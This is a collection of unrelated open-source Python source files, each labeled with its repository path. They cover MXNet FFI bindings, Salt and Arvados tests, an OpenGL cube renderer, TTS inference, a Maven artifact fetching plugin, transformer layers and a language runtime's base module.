ensure_ascii=False,
allow_nan=False,
indent=None,
ignore_nan=True,
separators=(",", ":"),
).encode("utf-8")
class GeoJSONResponse(JSONResponse):
"""GeoJSON Response"""
media_type = "application/geo+json"
|
python/mxnet/_ffi/function.py | mchoi8739/incubator-mxnet | 211 | 12728934 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-import
"""
Function namespace.
Acknowledgement: This file originates from incubator-tvm
"""
import os
import sys
import ctypes
from ..base import _LIB, check_call
from .base import py_str, c_str
try:
if int(os.environ.get("MXNET_ENABLE_CYTHON", True)) == 0:
from ._ctypes.function import FunctionBase as _FunctionBase
# To set RETURN_SWITCH for OBJECT_HANDLE
from . import object
else:
from ._cy3.core import FunctionBase as _FunctionBase
except ImportError:
if int(os.environ.get("MXNET_ENFORCE_CYTHON", False)) != 0:
raise ImportError("Cython Module cannot be loaded but MXNET_ENFORCE_CYTHON=1")
from ._ctypes.function import FunctionBase as _FunctionBase
# To set RETURN_SWITCH for OBJECT_HANDLE
from . import object
FunctionHandle = ctypes.c_void_p
class Function(_FunctionBase):
"""The PackedFunc object used in TVM.
Function plays an key role to bridge front and backend in TVM.
Function provide a type-erased interface, you can call function with positional arguments.
The compiled module returns Function.
TVM backend also registers and exposes its API as Functions.
For example, the developer function exposed in tvm.ir_pass are actually
C++ functions that are registered as PackedFunc
The following are list of common usage scenario of tvm.Function.
- Automatic exposure of C++ API into python
- To call PackedFunc from python side
- To call python callbacks to inspect results in generated code
- Bring python hook into C++ backend
See Also
--------
tvm.register_func: How to register global function.
tvm.get_global_func: How to get global function.
"""
def get_global_func(name, allow_missing=False):
"""Get a global function by name
Parameters
----------
name : str
The name of the global function
allow_missing : bool
Whether allow missing function or raise an error.
Returns
-------
func : tvm.Function
The function to be returned, None if function is missing.
"""
handle = FunctionHandle()
check_call(_LIB.MXNetFuncGetGlobal(c_str(name), ctypes.byref(handle)))
if handle.value:
return Function(handle, False)
if allow_missing:
return None
raise ValueError("Cannot find global function %s" % name)
def list_global_func_names():
"""Get list of global functions registered.
Returns
-------
names : list
List of global functions names.
"""
plist = ctypes.POINTER(ctypes.c_char_p)()
size = ctypes.c_uint()
check_call(_LIB.MXNetFuncListGlobalNames(ctypes.byref(size),
ctypes.byref(plist)))
fnames = []
for i in range(size.value):
fnames.append(py_str(plist[i]))
return fnames
def _get_api(f):
flocal = f
flocal.is_global = True
return flocal
def _init_api(namespace, target_module_name=None):
"""Initialize api for a given module name
namespace : str
The namespace of the source registry
target_module_name : str
The target module name if different from namespace
"""
target_module_name = (
target_module_name if target_module_name else namespace)
if namespace.startswith("mxnet."):
_init_api_prefix(target_module_name, namespace[6:])
else:
_init_api_prefix(target_module_name, namespace)
def _init_api_prefix(module_name, prefix):
module = sys.modules[module_name]
for name in list_global_func_names():
if prefix == "api":
fname = name
if name.startswith("_"):
target_module = sys.modules["mxnet._api_internal"]
else:
target_module = module
else:
if not name.startswith(prefix):
continue
fname = name[len(prefix)+1:]
target_module = module
if fname.find(".") != -1:
continue
f = get_global_func(name)
ff = _get_api(f)
ff.__name__ = fname
ff.__doc__ = ("MXNet PackedFunc %s. " % fname)
setattr(target_module, ff.__name__, ff)
|
tests/pytests/functional/states/test_npm.py | markgras/salt | 9,425 | 12728956 | <gh_stars>1000+
import pytest
from salt.exceptions import CommandExecutionError
@pytest.fixture(scope="module", autouse=True)
def install_npm(sminion):
try:
sminion.functions.state.single("pkg.installed", name="npm")
# Just name the thing we're looking for
sminion.functions.npm # pylint: disable=pointless-statement
except (CommandExecutionError, AttributeError) as e:
pytest.skip("Unable to install npm - " + str(e))
@pytest.mark.slow_test
@pytest.mark.destructive_test
@pytest.mark.requires_network
def test_removed_installed_cycle(states, modules):
project_version = "[email protected]"
success = modules.npm.uninstall("pm2")
assert success, "Unable to uninstall pm2 in prep for tests"
ret = states.npm.installed(name=project_version)
assert ret.result is True, "Failed to states.npm.installed {} - {}".format(
project_version, ret.comment
)
ret = states.npm.removed(name=project_version)
assert ret.result is True, "Failed to states.npm.removed {} - {}".format(
project_version, ret.comment
)
|
src/openvr/color_cube_actor.py | risa2000/pyopenvr | 204 | 12728971 | #!/bin/env python
# file color_cube_actor.py
from textwrap import dedent
from OpenGL.GL import * # @UnusedWildImport # this comment squelches an IDE warning
from OpenGL.GL.shaders import compileShader, compileProgram
from openvr.glframework import shader_string
"""
Color cube for use in "hello world" openvr apps
"""
class ColorCubeActor(object):
"""
Draws a cube
2________ 3
/| /|
6/_|____7/ |
| |_____|_|
| /0 | /1
|/______|/
4 5
"""
def __init__(self):
self.shader = 0
self.vao = None
def init_gl(self):
vertex_shader = compileShader(
shader_string("""
// Adapted from @jherico's RiftDemo.py in pyovr
layout(location = 0) uniform mat4 Projection = mat4(1);
layout(location = 4) uniform mat4 ModelView = mat4(1);
layout(location = 8) uniform float Size = 0.3;
// Minimum Y value is zero, so cube sits on the floor in room scale
const vec3 UNIT_CUBE[8] = vec3[8](
vec3(-1.0, -0.0, -1.0), // 0: lower left rear
vec3(+1.0, -0.0, -1.0), // 1: lower right rear
vec3(-1.0, +2.0, -1.0), // 2: upper left rear
vec3(+1.0, +2.0, -1.0), // 3: upper right rear
vec3(-1.0, -0.0, +1.0), // 4: lower left front
vec3(+1.0, -0.0, +1.0), // 5: lower right front
vec3(-1.0, +2.0, +1.0), // 6: upper left front
vec3(+1.0, +2.0, +1.0) // 7: upper right front
);
const vec3 UNIT_CUBE_NORMALS[6] = vec3[6](
vec3(0.0, 0.0, -1.0),
vec3(0.0, 0.0, 1.0),
vec3(1.0, 0.0, 0.0),
vec3(-1.0, 0.0, 0.0),
vec3(0.0, 1.0, 0.0),
vec3(0.0, -1.0, 0.0)
);
const int CUBE_INDICES[36] = int[36](
0, 1, 2, 2, 1, 3, // front
4, 6, 5, 6, 5, 7, // back
0, 2, 4, 4, 2, 6, // left
1, 3, 5, 5, 3, 7, // right
2, 6, 3, 6, 3, 7, // top
0, 1, 4, 4, 1, 5 // bottom
);
out vec3 _color;
void main() {
_color = vec3(1.0, 0.0, 0.0);
int vertexIndex = CUBE_INDICES[gl_VertexID];
int normalIndex = gl_VertexID / 6;
_color = UNIT_CUBE_NORMALS[normalIndex];
if (any(lessThan(_color, vec3(0.0)))) {
_color = vec3(1.0) + _color;
}
gl_Position = Projection * ModelView * vec4(UNIT_CUBE[vertexIndex] * Size, 1.0);
}
"""),
GL_VERTEX_SHADER)
fragment_shader = compileShader(
shader_string("""
in vec3 _color;
out vec4 FragColor;
void main() {
FragColor = vec4(_color, 1.0);
}
"""),
GL_FRAGMENT_SHADER)
self.shader = compileProgram(vertex_shader, fragment_shader)
#
self.vao = glGenVertexArrays(1)
glBindVertexArray(self.vao)
glEnable(GL_DEPTH_TEST)
def display_gl(self, modelview, projection):
glUseProgram(self.shader)
glUniformMatrix4fv(0, 1, False, projection)
glUniformMatrix4fv(4, 1, False, modelview)
glBindVertexArray(self.vao)
glDrawArrays(GL_TRIANGLES, 0, 36)
def dispose_gl(self):
glDeleteProgram(self.shader)
self.shader = 0
if self.vao:
glDeleteVertexArrays(1, (self.vao,))
self.vao = 0
|
scripts/tacotron_save_spec.py | gioannides/OpenSeq2Seq | 1,459 | 12728989 | %matplotlib inline
# Replace the first box of Interactive_Infer_example.ipynb with this
import IPython
import librosa
import numpy as np
import scipy.io.wavfile as wave
import tensorflow as tf
import matplotlib.pyplot as plt
from open_seq2seq.utils.utils import deco_print, get_base_config, check_logdir,\
create_logdir, create_model, get_interactive_infer_results
from open_seq2seq.models.text2speech import save_audio
args_T2S = ["--config_file=Infer_T2S/config.py",
"--mode=interactive_infer",
"--logdir=Infer_T2S/",
"--batch_size_per_gpu=1",
]
# A simpler version of what run.py does. It returns the created model and its saved checkpoint
def get_model(args, scope):
with tf.variable_scope(scope):
args, base_config, base_model, config_module = get_base_config(args)
checkpoint = check_logdir(args, base_config)
model = create_model(args, base_config, config_module, base_model, None)
return model, checkpoint
model_T2S, checkpoint_T2S = get_model(args_T2S, "T2S")
# Create the session and load the checkpoints
sess_config = tf.ConfigProto(allow_soft_placement=True)
sess_config.gpu_options.allow_growth = True
sess = tf.InteractiveSession(config=sess_config)
vars_T2S = {}
for v in tf.get_collection(tf.GraphKeys.VARIABLES):
if "T2S" in v.name:
vars_T2S["/".join(v.op.name.split("/")[1:])] = v
saver_T2S = tf.train.Saver(vars_T2S)
saver_T2S.restore(sess, checkpoint_T2S)
# line = "I was trained using Nvidia's Open Sequence to Sequence framework."
# Define the inference function
n_fft = model_T2S.get_data_layer().n_fft
sampling_rate = model_T2S.get_data_layer().sampling_rate
def infer(line):
print("Input English")
print(line)
# Generate speech
results = get_interactive_infer_results(model_T2S, sess, model_in=[line])
audio_length = results[1][4][0]
if model_T2S.get_data_layer()._both:
prediction = results[1][5][0]
else:
prediction = results[1][1][0]
prediction = prediction[:audio_length-1,:]
mag_prediction = model_T2S.get_data_layer().get_magnitude_spec(prediction)
mag_prediction_squared = np.clip(mag_prediction, a_min=0, a_max=255)
mag_prediction_squared = mag_prediction_squared**1.5
mag_prediction_squared = np.square(mag_prediction_squared)
mel_basis = librosa.filters.mel(sr=22050, n_fft=1024, n_mels=80, htk=True, norm=None)
mel = np.dot(mel_basis, mag_prediction_squared.T)
mel = np.log(np.clip(mel, a_min=1e-5, a_max=None))
np.save("spec2", mel)
plt.imshow(mel)
plt.gca().invert_yaxis()
plt.show()
wav = save_audio(mag_prediction, "unused", "unused", sampling_rate=sampling_rate, save_format="np.array", n_fft=n_fft)
audio = IPython.display.Audio(wav, rate=sampling_rate)
print("Generated Audio")
IPython.display.display(audio)
|
sdk/cwl/tests/test_util.py | rpatil524/arvados | 222 | 12729006 | <reponame>rpatil524/arvados
# Copyright (C) The Arvados Authors. All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
from builtins import bytes
import unittest
import mock
import datetime
import httplib2
from arvados_cwl.util import *
from arvados.errors import ApiError
class MockDateTime(datetime.datetime):
@classmethod
def utcnow(cls):
return datetime.datetime(2018, 1, 1, 0, 0, 0, 0)
datetime.datetime = MockDateTime
class TestUtil(unittest.TestCase):
def test_get_intermediate_collection_info(self):
name = "one"
current_container = {"uuid": "zzzzz-8i9sb-zzzzzzzzzzzzzzz"}
intermediate_output_ttl = 120
info = get_intermediate_collection_info(name, current_container, intermediate_output_ttl)
self.assertEqual(info["name"], "Intermediate collection for step one")
self.assertEqual(info["trash_at"], datetime.datetime(2018, 1, 1, 0, 2, 0, 0))
self.assertEqual(info["properties"], {"type" : "intermediate", "container" : "zzzzz-8i9sb-zzzzzzzzzzzzzzz"})
def test_get_current_container_success(self):
api = mock.MagicMock()
api.containers().current().execute.return_value = {"uuid" : "zzzzz-8i9sb-zzzzzzzzzzzzzzz"}
current_container = get_current_container(api)
self.assertEqual(current_container, {"uuid" : "zzzzz-8i9sb-zzzzzzzzzzzzzzz"})
def test_get_current_container_error(self):
api = mock.MagicMock()
api.containers().current().execute.side_effect = ApiError(httplib2.Response({"status": 300}), bytes(b""))
logger = mock.MagicMock()
with self.assertRaises(ApiError):
get_current_container(api, num_retries=0, logger=logger)
def test_get_current_container_404_error(self):
api = mock.MagicMock()
api.containers().current().execute.side_effect = ApiError(httplib2.Response({"status": 404}), bytes(b""))
logger = mock.MagicMock()
current_container = get_current_container(api, num_retries=0, logger=logger)
self.assertEqual(current_container, None) |
atomic_reactor/plugins/fetch_maven_artifacts.py | qixiang/atomic-reactor | 113 | 12729008 | <filename>atomic_reactor/plugins/fetch_maven_artifacts.py
"""
Copyright (c) 2017-2022 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
"""
import dataclasses
import functools
import hashlib
import os
from pathlib import Path
from typing import Iterator, List, Sequence, Dict
import koji
from atomic_reactor import util
from atomic_reactor.constants import (PLUGIN_FETCH_MAVEN_KEY,
REPO_FETCH_ARTIFACTS_URL,
REPO_FETCH_ARTIFACTS_KOJI)
from atomic_reactor.config import get_koji_session
from atomic_reactor.dirs import BuildDir
from atomic_reactor.download import download_url
from atomic_reactor.plugin import Plugin
from atomic_reactor.utils.koji import NvrRequest
from atomic_reactor.utils.pnc import PNCUtil
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
@dataclasses.dataclass(frozen=True)
class DownloadRequest:
url: str
dest: str
checksums: Dict[str, str]
class FetchMavenArtifactsPlugin(Plugin):
key = PLUGIN_FETCH_MAVEN_KEY
is_allowed_to_fail = False
DOWNLOAD_DIR = 'artifacts'
def __init__(self, workflow):
"""
:param workflow: DockerBuildWorkflow instance
"""
super(FetchMavenArtifactsPlugin, self).__init__(workflow)
self.path_info = self.workflow.conf.koji_path_info
all_allowed_domains = self.workflow.conf.artifacts_allowed_domains
self.allowed_domains = set(domain.lower() for domain in all_allowed_domains or [])
self.session = None
self._pnc_util = None
self.no_source_artifacts = []
self.source_url_to_artifacts = {}
@property
def pnc_util(self):
if not self._pnc_util:
pnc_map = self.workflow.conf.pnc
if not pnc_map:
raise RuntimeError('No PNC configuration found in reactor config map')
self._pnc_util = PNCUtil(pnc_map)
return self._pnc_util
def process_by_nvr(self, nvr_requests: List[NvrRequest]):
# components are metadata about nvr artifacts that we're going to fetch
components = []
download_queue = []
errors = []
for nvr_request in nvr_requests:
build_info = self.session.getBuild(nvr_request.nvr)
if not build_info:
errors.append('Build {} not found.'.format(nvr_request.nvr))
continue
maven_build_path = self.path_info.mavenbuild(build_info)
build_archives = self.session.listArchives(buildID=build_info['id'],
type='maven')
build_archives = nvr_request.match_all(build_archives)
for build_archive in build_archives:
maven_file_path = self.path_info.mavenfile(build_archive)
# NOTE: Don't use urljoin here because maven_build_path does
# not contain a trailing slash, which causes the last dir to
# be dropped.
url = maven_build_path + '/' + maven_file_path
checksum_type = koji.CHECKSUM_TYPES[build_archive['checksum_type']]
checksums = {checksum_type: build_archive['checksum']}
download_queue.append(DownloadRequest(url, maven_file_path, checksums))
components.append({
'type': 'kojifile',
'filename': build_archive['filename'],
'filesize': build_archive['size'],
'checksum': build_archive['checksum'],
'checksum_type': checksum_type,
'nvr': nvr_request.nvr,
'archive_id': build_archive['id'],
})
unmatched_archive_requests = nvr_request.unmatched()
if unmatched_archive_requests:
errors.append('NVR request for "{}", failed to find archives for: "{}"'
.format(nvr_request.nvr, unmatched_archive_requests))
continue
if errors:
raise ValueError('Errors found while processing {}: {}'
.format(REPO_FETCH_ARTIFACTS_KOJI, ', '.join(errors)))
return components, download_queue
def process_by_url(self, url_requests):
download_queue = []
# we'll capture all source artifacts of url artifacts in a source_download_queue
# later on maven_url_sources_metadata plugin will process this queue to generate
# remote source files that are later used in source container build to get sources
# of url artifacts.
# we have to do this in post build to avoid having source artifacts in build_dir
# during binary build
source_download_queue = []
errors = []
for url_request in url_requests:
url = url_request['url']
if self.allowed_domains:
parsed_file_url = urlparse(url.lower())
file_url = parsed_file_url.netloc + parsed_file_url.path
if not any(file_url.startswith(prefix) for prefix in self.allowed_domains):
errors.append('File URL {} is not in list of allowed domains: {}'
.format(file_url, self.allowed_domains))
continue
checksums = {algo: url_request[algo] for algo in hashlib.algorithms_guaranteed
if algo in url_request}
target = url_request.get('target', url.rsplit('/', 1)[-1])
download_queue.append(DownloadRequest(url, target, checksums))
artifact = {
'url': url_request['url'],
'checksums': checksums,
'filename': os.path.basename(url_request['url'])
}
if 'source-url' not in url_request:
self.no_source_artifacts.append(artifact)
msg = f"No source-url found for {url_request['url']}.\n"
self.log.warning(msg)
msg += 'fetch-artifacts-url without source-url is deprecated\n'
msg += 'to fix this please provide the source-url according to ' \
'https://osbs.readthedocs.io/en/latest/users.html#fetch-artifacts-url-yaml'
self.log.user_warning(msg)
continue
source_url = url_request['source-url']
checksums = {algo: url_request[('source-' + algo)] for algo in
hashlib.algorithms_guaranteed
if ('source-' + algo) in url_request}
if source_url not in self.source_url_to_artifacts:
self.source_url_to_artifacts[source_url] = [artifact]
# source_url will mostly be gerrit URLs that don't have filename
# in the URL itself, so we'll have to get filename from URL response
target = os.path.basename(source_url)
source_download_queue.append(dataclasses.asdict(DownloadRequest(source_url, target,
checksums)))
else:
self.source_url_to_artifacts[source_url].append(artifact)
if errors:
raise ValueError('Errors found while processing {}: {}'
.format(REPO_FETCH_ARTIFACTS_URL, ', '.join(errors)))
return download_queue, source_download_queue
def process_pnc_requests(self, pnc_requests):
download_queue = []
artifact_ids = []
builds = pnc_requests.get('builds', [])
if builds:
pnc_build_metadata = {'builds': []}
else:
pnc_build_metadata = {}
for build in builds:
pnc_build_metadata['builds'].append({'id': build['build_id']})
for artifact in build['artifacts']:
artifact_ids.append(artifact['id'])
url, checksums = self.pnc_util.get_artifact(artifact['id'])
download_queue.append(DownloadRequest(url, artifact['target'], checksums))
return artifact_ids, download_queue, pnc_build_metadata
def download_files(
self, downloads: Sequence[DownloadRequest], build_dir: BuildDir
) -> Iterator[Path]:
"""Download maven artifacts to a build dir."""
artifacts_path = build_dir.path / self.DOWNLOAD_DIR
koji_config = self.workflow.conf.koji
insecure = koji_config.get('insecure_download', False)
self.log.debug('%d files to download', len(downloads))
session = util.get_retrying_requests_session()
for index, download in enumerate(downloads):
dest_path = artifacts_path / download.dest
dest_dir = dest_path.parent
dest_filename = dest_path.name
if not dest_dir.exists():
dest_dir.mkdir(parents=True)
self.log.debug('%d/%d downloading %s', index + 1, len(downloads),
download.url)
download_url(url=download.url, dest_dir=dest_dir, insecure=insecure, session=session,
dest_filename=dest_filename, expected_checksums=download.checksums)
yield dest_path
def run(self):
self.session = get_koji_session(self.workflow.conf)
nvr_requests = [
NvrRequest(**nvr_request) for nvr_request in
util.read_fetch_artifacts_koji(self.workflow) or []
]
pnc_requests = util.read_fetch_artifacts_pnc(self.workflow) or {}
url_requests = util.read_fetch_artifacts_url(self.workflow) or []
components, nvr_download_queue = self.process_by_nvr(nvr_requests)
url_download_queue, source_download_queue = self.process_by_url(url_requests)
pnc_artifact_ids, pnc_download_queue, pnc_build_metadata = self.process_pnc_requests(
pnc_requests)
download_queue = pnc_download_queue + nvr_download_queue + url_download_queue
download_to_build_dir = functools.partial(self.download_files, download_queue)
self.workflow.build_dir.for_all_platforms_copy(download_to_build_dir)
return {
'components': components,
'download_queue': [dataclasses.asdict(download) for download in download_queue],
'no_source': self.no_source_artifacts,
'pnc_artifact_ids': pnc_artifact_ids,
'pnc_build_metadata': pnc_build_metadata,
'source_download_queue': source_download_queue,
'source_url_to_artifacts': self.source_url_to_artifacts,
}
|
models/res_users.py | wdw139130/wechat-mall | 108 | 12729102 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
from odoo import models, fields, api
class ResUsers(models.Model):
_inherit = 'res.users'
sub_domain = fields.Char('子域名', help='用于小程序接口的子域名。', index=True)
@api.model
def create(self, vals):
from uuid import uuid1
vals['sub_domain'] = uuid1().get_hex()
return super(ResUsers, self).create(vals)
|
test.py | wu546300070/weiboanalysis | 685 | 12729133 | <gh_stars>100-1000
import re
word="jofwjoifA级哦啊接我金佛安fewfae慰剂serge"
p = re.compile(r'\w', re.L)
result = p.sub("", word)
print(result) |
easytransfer/layers/encoder_decoder.py | johnson7788/EasyTransfer | 806 | 12729136 | <reponame>johnson7788/EasyTransfer
# coding=utf-8
# Copyright (c) 2019 Alibaba PAI team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tensorflow.python.layers.base import Layer
from .activations import gelu_new
from .attention import Attention, CrossAttention
from .core import dense_dropoutput_layernorm, Dense
from .utils import get_initializer
class EncoderBlock(Layer):
def __init__(self, config, **kwargs):
super(EncoderBlock, self).__init__(**kwargs)
self.attention = Attention(config, name="attention")
# Use gelu_new, then match results
self.intermediate = Dense(
units=config.intermediate_size,
activation=gelu_new,
kernel_initializer=get_initializer(config.initializer_range),
name="intermediate/dense")
self.bert_output = dense_dropoutput_layernorm(config, name="output")
def call(self, inputs, training=False):
hidden_states, attention_mask = inputs
attention_output = self.attention([hidden_states, attention_mask], training=training)
intermediate_output = self.intermediate(attention_output)
layer_output = self.bert_output([intermediate_output, attention_output], training=training)
return layer_output, attention_output
class DecoderBlock(Layer):
def __init__(self, config, **kwargs):
super(DecoderBlock, self).__init__(**kwargs)
self.attention = Attention(config, name="decoder_attention")
self.cross_attention = CrossAttention(config, name="decoder_cross_attention")
# Use gelu_new, then match results
self.intermediate = Dense(
units=config.intermediate_size,
activation=gelu_new,
kernel_initializer=get_initializer(config.initializer_range),
name="intermediate/dense")
self.output_1 = dense_dropoutput_layernorm(config, name="output_1")
self.output_2 = dense_dropoutput_layernorm(config, name="output_2")
def call(self, inputs, training=False):
hidden_states, encoder_hidden_states, attention_mask, encoder_attention_mask = inputs
attention_output = self.attention([hidden_states, attention_mask], training=training)
cross_attention_output = self.cross_attention([hidden_states, encoder_hidden_states,
encoder_attention_mask])
attention_output = self.output_1([attention_output, cross_attention_output], training=training)
intermediate_output = self.intermediate(attention_output)
layer_output = self.output_2([intermediate_output, attention_output], training=training)
return layer_output, attention_output
class Encoder(Layer):
def __init__(self, config, **kwargs):
super(Encoder, self).__init__(**kwargs)
self.layer = [EncoderBlock(config, name="layer_{}".format(i)) for i in range(config.num_hidden_layers)]
def call(self, inputs, training=False):
hidden_states, attention_mask = inputs
all_hidden_states = ()
all_att_outputs = ()
for i, layer_module in enumerate(self.layer):
layer_output, att_output = layer_module([hidden_states, attention_mask], training=training)
hidden_states = layer_output
all_hidden_states = all_hidden_states + (hidden_states,)
all_att_outputs = all_att_outputs + (att_output,)
final_outputs = []
for hidden_states in all_hidden_states:
final_outputs.append(hidden_states)
return final_outputs, all_att_outputs
class Decoder(Layer):
def __init__(self, config, **kwargs):
super(Decoder, self).__init__(**kwargs)
self.layer = [DecoderBlock(config, name="decoder_layer_{}".format(i)) for i in range(config.num_hidden_layers)]
def call(self, inputs, training=False):
hidden_states, encoder_hidden_states, attention_mask, encoder_attention_mask = inputs
all_hidden_states = ()
all_att_outputs = ()
for i, layer_module in enumerate(self.layer):
layer_output, att_output = layer_module([hidden_states,
encoder_hidden_states,
attention_mask,
encoder_attention_mask
], training=training)
hidden_states = layer_output
all_hidden_states = all_hidden_states + (hidden_states,)
all_att_outputs = all_att_outputs + (att_output,)
final_outputs = []
for hidden_states in all_hidden_states:
final_outputs.append(hidden_states)
return final_outputs, all_att_outputs
|
runtime/base.py | cheery/lever | 136 | 12729159 | <reponame>cheery/lever<gh_stars>100-1000
from async_io import Event, Queue
from evaluator.loader import from_object
from evaluator.sourcemaps import TraceEntry
from rpython.rlib.objectmodel import specialize, always_inline
from rpython.rlib.rstring import UnicodeBuilder
from rpython.rtyper.lltypesystem import rffi
from space.customobject import CustomObject_instantiate
from space import *
import core
import naming
import os
import pathobj
#import stdlib
import sys
import time
import uv_handle
import uv_stream
import uv_timer
import uv_util
import vectormath
import vector
# The base environment
module = Module(u'base', {
u'builtin': Builtin.interface,
u'greenlet': core.Greenlet.interface,
u'interface': Interface.interface,
u'Id': Id.interface,
u'dict': Dict.interface,
u'Module': Module.interface,
u'module': Module.interface, # TODO: deprecate and then remove
u'object': Object.interface,
u'list': List.interface,
u'multimethod': Multimethod.interface,
u'float': Float.interface,
u'float_repr': FloatRepr.interface,
u'int': Integer.interface,
u'bool': Boolean.interface,
u'str': String.interface,
u'null': null,
u'true': true,
u'false': false,
u'path': pathobj.Path.interface,
u'property': Property.interface,
u'Uint8Data': Uint8Data.interface,
u'Uint8Array': Uint8Array.interface,
u'Uint8Slice': Uint8Slice.interface,
u'Uint8Builder': Uint8Builder.interface,
u'Utf8Decoder': Utf8Decoder.interface,
u'StringBuilder': StringBuilder_.interface,
u'schedule': Builtin(core.schedule, u'schedule'),
u'set': Set.interface,
u'slice': Slice.interface,
u'DocRef': naming.DocRef.interface,
u'Event': Event.interface,
u'Queue': Queue.interface,
u'Timer': uv_timer.Timer.interface,
u'Handle': uv_handle.Handle.interface,
u'Stream': uv_stream.Stream.interface,
u'TTY': uv_stream.TTY.interface,
u'Pipe': uv_stream.Pipe.interface,
# The new vector interface, lets see how it fares.
u'Numeric': vector.Numeric.interface,
}, frozen=True)
@Module.instantiator
@signature(String, Module, optional=1)
def module_instantiate(name, extends):
return Module(name.string, {}, extends)
# we may later want to do the same for the stuff you see above.
for error in all_errors:
module.setattr_force(error.interface.name, error.interface)
for _, error in uv_util.errors:
module.setattr_force(error.interface.name, error.interface)
for name, value in operators.by_symbol.iteritems():
module.setattr_force(name, value)
for name, value in vectormath.by_symbol.iteritems():
module.setattr_force(name, value)
def builtin(fn):
name = fn.__name__.rstrip('_').decode('utf-8')
module.setattr_force(name, Builtin(fn, name))
return fn
@builtin
@signature(Object, Float, optional=1)
def get_name(obj, stale):
if stale is None:
name = naming.get_name(obj)
else:
name = naming.get_name(obj, stale.number)
if name is not None:
return String(name)
else:
return null
@builtin
@signature(Object, Object, optional=1)
def load(program, path):
if path is None:
path = null
else:
path = pathobj.to_path(path)
return from_object(program, path)
@builtin
def class_(argv):
exnihilo = argv[0]
parent = Object.interface
name = String(u"customobject")
assert 1 <= len(argv) <= 3
if len(argv) > 1:
parent = argv[1]
if len(argv) > 2:
name = argv[2]
assert isinstance(exnihilo, Exnihilo)
methods = {}
for key, index in exnihilo.map.attribute_indexes.items():
methods[key] = exnihilo.storage[index]
interface = Interface(
cast(parent, Interface, u"parent"),
cast(name, String, u"name").string,
methods,
CustomObject_instantiate)
core.g.finalizer_queue.register_finalizer(interface)
return interface
@builtin
@signature(Object)
def iter_(obj):
return obj.iter()
@builtin
@signature(Object)
def hash_(obj):
return Integer(obj.hash())
@builtin
@signature(Object)
def repr_(obj):
return String(obj.repr())
@builtin
@signature(List)
def reversed_(obj):
return ReversedListIterator(reversed(obj.contents))
class ReversedListIterator(Object):
_immutable_fields_ = ['iterator']
def __init__(self, iterator):
self.iterator = iterator
def iter(self):
return self
@ReversedListIterator.method(u"next", signature(ReversedListIterator))
def ReversedListIterator_next(self):
return self.iterator.next()
@builtin
@signature(Object, Object)
def getitem(obj, index):
return obj.getitem(index)
@builtin
@signature(Object, Object, Object)
def setitem(obj, index, value):
return obj.setitem(index, value)
@builtin
@signature(Object)
def listattr(obj):
return List(obj.listattr())
## The interface for analysing the interface.
@builtin
@signature(Interface)
def list_methods(interface):
out = []
for name in interface.methods:
out.append(String(name))
return List(out)
@builtin
@signature(Interface)
def list_multimethods(interface):
out = []
for record in interface.multimethods:
types = []
for ref in record.vec:
interface = ref.weakref()
if interface is not None:
types.append(interface)
if len(types) == len(record.vec):
row = Exnihilo()
row.setattr(u'multimethod', record.multimethod)
row.setattr(u'types', List(types))
out.append(row)
return List(out)
@builtin
@signature(Object, String)
def getattr(obj, index):
return obj.getattr(index.string)
@builtin
@signature(Object, String, Object, optional=1)
def getattr_or(obj, index, default):
if default is None:
default = null
return obj.getattr_or(index.string, default)
@builtin
@signature(Object, String, Object)
def setattr(obj, index, value):
return obj.setattr(index.string, value)
@builtin
@signature(String)
def ord_(string):
if len(string.string) != 1:
raise unwind(LError(u"ord expects a char"))
return Integer(ord(string.string[0]))
@builtin
@signature(Integer)
def chr_(value):
return String(unichr(value.value))
@builtin
@signature(Object, Object)
def isinstance_(value, which_list):
if isinstance(which_list, List):
whichs = which_list.contents
else:
whichs = [which_list]
interface = get_interface(value)
while interface is not null:
if interface in whichs:
return true
# There should be exactly one recursively defined interface.
if interface.parent is interface:
return false
interface = interface.parent
return false
@builtin
@signature(String, Integer, optional=1)
def parse_int(string, base):
return Integer(parse_int_(string, base))
@builtin
@signature(String)
def parse_float(string):
return FloatRepr(string)
# And and or are macros in the compiler. These are
# convenience functions, likely not often used.
# erm. Actually 'and' function is used by chaining.
@builtin
@signature(Object, Object)
def and_(a, b):
return boolean(is_true(a) and is_true(b))
@builtin
@signature(Object, Object)
def or_(a, b):
return boolean(is_true(a) or is_true(b))
@builtin
@signature(Object)
def len_(obj):
return obj.getattr(u'length')
@builtin
@signature(Object)
def not_(a):
return boolean(is_false(a))
@builtin
@signature(String)
def encode_utf8(value):
return to_uint8array(value.string.encode('utf-8'))
@builtin
@signature(Uint8Data)
def decode_utf8(value):
try:
return String(value.to_str().decode('utf-8'))
except UnicodeDecodeError as error:
raise space.unwind(space.LError(u"unicode decode failed"))
@builtin
def time_(argv):
return Float(time.time())
@builtin
@signature()
def getcwd():
return pathobj.getcwd()
@builtin
@signature(Object)
def chdir(obj):
pathobj.chdir(obj)
return null
@builtin
@signature(Integer, Integer, Integer, optional=2)
def range_(start, stop, step):
if stop is None:
stop = start.value
start = 0
else:
start = start.value
stop = stop.value
if step is None:
step = 1
else:
step = step.value
if step == 0:
raise unwind(LTypeError(u"step==0"))
return Range(start, stop, step)
class Range(Object):
__slots__ = ['start', 'stop', 'step', 'sign', 'current']
_immutable_fields_ = ['start', 'stop', 'step', 'sign']
def __init__(self, start, stop, step):
self.current = start
self.stop = stop
self.step = step
self.sign = +1 if step >= 0 else -1
def iter(self):
return self
